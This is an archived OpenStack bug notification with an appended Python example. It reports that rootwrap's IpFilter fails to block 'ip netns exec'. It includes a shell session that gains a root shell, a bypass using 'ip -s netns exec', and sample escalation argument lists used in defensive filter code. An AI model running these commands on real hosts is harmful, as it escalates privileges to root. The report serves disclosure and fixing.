yahoo-eng-team team mailing list archive

[Bug 1081795] Re: Nova rootwrap is too permissive with iproute(2) arguments

 

Rewritten as an oslo.rootwrap bug.

** Project changed: nova => oslo

** Changed in: oslo
   Importance: Wishlist => High

** Changed in: oslo
       Status: In Progress => Triaged

** Changed in: oslo
     Assignee: Mark McClain (markmcclain) => (unassigned)

** Summary changed:

- Nova rootwrap is too permissive with iproute(2) arguments
+ IpFilter fails to prevent ip netns exec

** Summary changed:

- IpFilter fails to prevent ip netns exec
+ oslo.rootwrap IpFilter fails to prevent ip netns exec

** Description changed:

- The Nova rootwrap filters allow the nova user to spawn an unrestricted
- root shell.  This is a problem that we fixed in Quantum over the summer,
- so I've got code to close the hole.
+ This is an oslo.rootwrap bug.
  
+ IpFilter is designed to allow any ip command, unless the second
+ parameter is "netns" (in which case you only allow ip netns
+ {list,add,delete}.
  
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/nova-rootwrap /etc/nova/rootwrap.conf ip netns add foo
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/nova-rootwrap /etc/nova/rootwrap.conf ip netns exec foo bash
- root@vagrant-precise:~/devstack# whoami
- root
- root@vagrant-precise:~/devstack# exit
- exit
- vagrant@vagrant-precise:~/devstack$ 
+ The trick is it's trivial to work around this (just run 'ip -s netns
+ exec').
  
- 
- For contrast here's how the Quantum wrapper behaves:
- 
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/quantum-rootwrap /etc/quantum/rootwrap.conf ip netns add foo
- vagrant@vagrant-precise:~/devstack$ sudo /usr/local/bin/quantum-rootwrap /etc/quantum/rootwrap.conf ip netns exec foo bash
- Unauthorized command: ip netns exec foo bash
- vagrant@vagrant-precise:~/devstack$
+ Once that's fixed, Nova should update from using a CommandFilter to
+ using the IpFilter for calling 'ip'.

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1081795

Title:
  oslo.rootwrap IpFilter fails to prevent ip netns exec

Status in Oslo - a Library of Common OpenStack Code:
  Triaged

Bug description:
  This is an oslo.rootwrap bug.

  IpFilter is designed to allow any ip command, unless the second
  parameter is "netns" (in which case you only allow ip netns
  {list,add,delete}).

  The trick is it's trivial to work around this (just run 'ip -s netns
  exec').

  Once that's fixed, Nova should update from using a CommandFilter to
  using the IpFilter for calling 'ip'.

To manage notifications about this bug go to:
https://bugs.launchpad.net/oslo/+bug/1081795/+subscriptions
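
The positional check described in the bug report, next to an option-aware variant that fails closed, as an added example (this is not oslo.rootwrap's code). The function names, the set of value-less ip options and the sample argument lists are assumptions constructed for illustration.

```python
NETNS_ALLOWED = {"list", "add", "delete"}  # subcommands the report says are permitted
FLAG_ONLY_OPTS = {"-s", "-d", "-o", "-r", "-4", "-6"}  # ip options that take no value


def positional_match(userargs):
    """Check as the report describes it: only the second parameter is inspected."""
    if not userargs or userargs[0] != "ip":
        return False
    if len(userargs) > 1 and userargs[1] == "netns":
        return len(userargs) > 2 and userargs[2] in NETNS_ALLOWED
    return True


def option_aware_match(userargs):
    """Locate the real ip object behind leading options; reject what cannot be parsed."""
    if not userargs or userargs[0] != "ip":
        return False
    rest = list(userargs[1:])
    while rest and rest[0] in FLAG_ONLY_OPTS:
        rest.pop(0)  # skip options known to carry no value
    if not rest or rest[0].startswith("-"):
        return False  # no object, or an option this filter does not understand
    # ip resolves abbreviated object names, so compare by prefix and fail closed
    if "netns".startswith(rest[0]):
        return len(rest) > 1 and rest[1] in NETNS_ALLOWED
    return True


SAMPLES = [  # constructed argument lists, as rootwrap would receive them
    ["ip", "link", "show"],
    ["ip", "netns", "list"],
    ["ip", "netns", "exec", "foo", "bash"],
    ["ip", "-s", "netns", "exec", "foo", "bash"],
    ["ip", "-o", "addr", "show"],
]


def compare(samples=SAMPLES):
    """Return (command, positional verdict, option-aware verdict) for each sample."""
    return [(" ".join(a), positional_match(a), option_aware_match(a)) for a in samples]


if __name__ == "__main__":
    for cmd, old, new in compare():
        print(f"{cmd:32} positional={old!s:5} option_aware={new}")
```

Options outside FLAG_ONLY_OPTS are rejected outright, so a deployment that needs, say, an address-family option has to extend the parser instead of widening the match.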